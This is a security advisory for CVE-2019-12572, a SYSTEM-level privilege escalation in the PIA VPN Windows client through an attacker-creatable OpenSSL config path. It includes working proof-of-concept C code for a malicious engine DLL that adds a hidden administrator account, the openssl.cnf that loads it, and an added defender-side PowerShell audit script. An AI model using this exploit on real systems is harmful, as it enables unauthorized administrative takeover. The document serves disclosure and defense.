security-research/vulnerabilities/PIA/CVE-2019-12572.txt
Title: PIA Windows Privilege Escalation: Malicious OpenSSL engine
Author: Rich Mirch
CVE: CVE-2019-12572
Vendor Advisory: N/A
Blog Post: https://blog.mirch.io/2019/06/10/cve-2019-12572-pia-windows-privilege-escalation-malicious-openssl-engine/
Description

A vulnerability in the London Trust Media Private Internet Access (PIA) VPN
Client 1.0.2 (build 02363) for Windows could allow an authenticated, local
attacker to run arbitrary code with elevated privileges.

On startup the PIA Windows service (pia-service.exe) loads the OpenSSL library from
C:\Program Files\Private Internet Access\libeay32.dll. This library attempts
to load the c:\etc\ssl\openssl.cnf configuration file, which does not exist. By
default on Windows systems, authenticated users can create directories under c:\.
A low privileged user can therefore create an openssl.cnf configuration file that
loads a malicious OpenSSL engine library, resulting in arbitrary code execution as
SYSTEM when the service starts.
CVSS

Vector: CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H/E:H/RL:U/RC:C
Base: 7.8
Temporal: 7.8

Test Environment

OS: Windows 10 Pro 10.0.17763
PIA Version: 1.0.2 (build 02363)
Steps to reproduce

Note: All steps are executed using a low privileged account.

1) Create the c:\etc\ssl directory

   mkdir c:\etc\ssl

2) Create a malicious engine library named woot.dll that creates an administrator
   account named woot when loaded.

   /* Cross compile with
      x86_64-w64-mingw32-g++ woot.c -o woot.dll -shared
   */
   #include <windows.h>

   BOOL WINAPI DllMain(
       HINSTANCE hinstDLL,
       DWORD fdwReason,
       LPVOID lpReserved )
   {
       switch( fdwReason )
       {
           case DLL_PROCESS_ATTACH:
               system("cmd /c net user woot insertpasswordhere /add");
               system("cmd /c net localgroup administrators woot /add");
               break;
           case DLL_THREAD_ATTACH:
               // Do thread-specific initialization.
               break;
           case DLL_THREAD_DETACH:
               // Do thread-specific cleanup.
               break;
           case DLL_PROCESS_DETACH:
               // Perform any necessary cleanup.
               break;
       }
       return TRUE; // Successful DLL_PROCESS_ATTACH.
   }

3) Copy the malicious woot.dll file into the c:\etc\ssl folder.

   copy woot.dll c:\etc\ssl

4) Create the OpenSSL configuration file in c:\etc\ssl\openssl.cnf with the following contents.

   openssl_conf = openssl_init

   [openssl_init]
   engines = engine_section

   [engine_section]
   woot = woot_section

   [woot_section]
   engine_id = woot
   dynamic_path = c:\\etc\\ssl\\woot.dll
   init = 0

5) Reboot the system, because a low privileged user does not have permission to
   restart the service.

6) After the reboot has completed, log in and open a command shell. At this point
   the "woot" administrator account will exist.

   net user woot
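The following audit script is an added example and is not part of the original advisory or of the PIA product. It checks, from a defender's side, the three conditions the description above relies on: whether low privileged principals can create directories directly under C:\, whether a c:\etc\ssl directory already exists and who owns it, and whether an openssl.cnf there points a dynamic_path at an engine DLL. The paths are the ones named in this advisory; the list of low privileged principals and the "owned by Administrators or SYSTEM" test are assumptions about a default Windows install.

```powershell
# Added defender-side audit for the condition described in CVE-2019-12572.
# Read-only: it reports findings and changes nothing.
# Assumptions: the principals in $lowPrivIds reflect a default Windows ACL on C:\,
# and an openssl.cnf under C:\etc\ssl that is owned by anyone other than
# Administrators or SYSTEM is treated as suspicious.

$cnfDir  = 'C:\etc\ssl'
$cnfFile = Join-Path $cnfDir 'openssl.cnf'
$lowPrivIds = @('BUILTIN\Users', 'NT AUTHORITY\Authenticated Users', 'Everyone')
$createDirs = [int][System.Security.AccessControl.FileSystemRights]::CreateDirectories

function Test-NonAdminCreateAccess {
    # True when any Allow ACE for a low privileged principal grants
    # CreateDirectories (AppendData) on $Path.
    param([string]$Path)
    $acl = Get-Acl -Path $Path
    foreach ($ace in $acl.Access) {
        if ($ace.AccessControlType -ne 'Allow') { continue }
        if ($lowPrivIds -notcontains $ace.IdentityReference.Value) { continue }
        if (([int]$ace.FileSystemRights -band $createDirs) -ne 0) { return $true }
    }
    return $false
}

$findings = @()

if (Test-NonAdminCreateAccess -Path 'C:\') {
    $findings += 'Low privileged users can create directories under C:\ (precondition for planting C:\etc\ssl).'
}

if (Test-Path -Path $cnfDir) {
    $owner = (Get-Acl -Path $cnfDir).Owner
    $findings += "$cnfDir exists; owner: $owner"
    if ($owner -notmatch '^(BUILTIN\\Administrators|NT AUTHORITY\\SYSTEM)$') {
        $findings += "$cnfDir is owned by a non-administrative principal; treat as suspicious."
    }
}

if (Test-Path -Path $cnfFile) {
    $findings += "$cnfFile exists (the service would read it at startup)."
    # Any dynamic_path line names an engine DLL the OpenSSL config would load.
    $hits = Select-String -Path $cnfFile -Pattern '^\s*dynamic_path\s*=\s*(.+?)\s*$'
    foreach ($hit in $hits) {
        $dllPath = $hit.Matches[0].Groups[1].Value -replace '\\\\', '\'
        $findings += "openssl.cnf line $($hit.LineNumber) loads engine DLL: $dllPath"
        if (Test-Path -Path $dllPath) {
            $sig = Get-AuthenticodeSignature -FilePath $dllPath
            $findings += "engine DLL present; Authenticode status: $($sig.Status); owner: $((Get-Acl $dllPath).Owner)"
        }
    }
}

if ($findings.Count -eq 0) {
    Write-Output 'No CVE-2019-12572 preconditions or artifacts found.'
} else {
    $findings | ForEach-Object { Write-Output "[!] $_" }
}
```

Run it from an elevated PowerShell prompt so Get-Acl can read every object. Any dynamic_path finding on a host running the affected client version is a strong indicator of the technique described above and the referenced DLL should be preserved for analysis; updating to the fixed release listed in the timeline removes the dependency on the attacker-creatable path.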
Timeline:

2019-02-16: Reported to vendor
2019-02-16: Vendor confirmed vulnerability
2019-06-04: Vendor released fix in v1.2.1
2019-06-10: Public disclosure